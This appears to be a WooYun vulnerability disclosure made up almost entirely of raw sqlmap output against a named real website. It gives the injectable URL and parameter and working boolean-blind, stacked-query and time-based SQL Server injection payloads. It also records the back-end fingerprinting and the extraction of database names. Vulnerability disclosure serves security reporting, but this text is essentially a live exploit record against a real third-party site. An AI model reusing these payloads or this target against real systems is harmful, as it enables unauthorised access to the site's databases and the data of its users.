WooYun.org

http://so.txooo.com/PP_1.htm?BrandType=1&InvestMoney=1

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: BrandType
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: BrandType=1 AND 7810=7810
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: BrandType=1; WAITFOR DELAY '0:0:5';--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: BrandType=1 WAITFOR DELAY '0:0:5'--
---
[19:03:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[19:03:05] [INFO] fetching database names
[19:03:05] [INFO] fetching number of databases
[19:03:05] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[19:03:05] [INFO] retrieved:
[19:03:06] [WARNING] reflective value(s) found and filtering out
[19:03:06] [WARNING] frames detected containing attacked parameter values. Pleas
e be sure to test those separately in case that attack on this page fails
51
[19:03:22] [INFO] retrieved: EnSAAS_001723_CD_2
[19:07:30] [INFO] retrieved: EnSAAS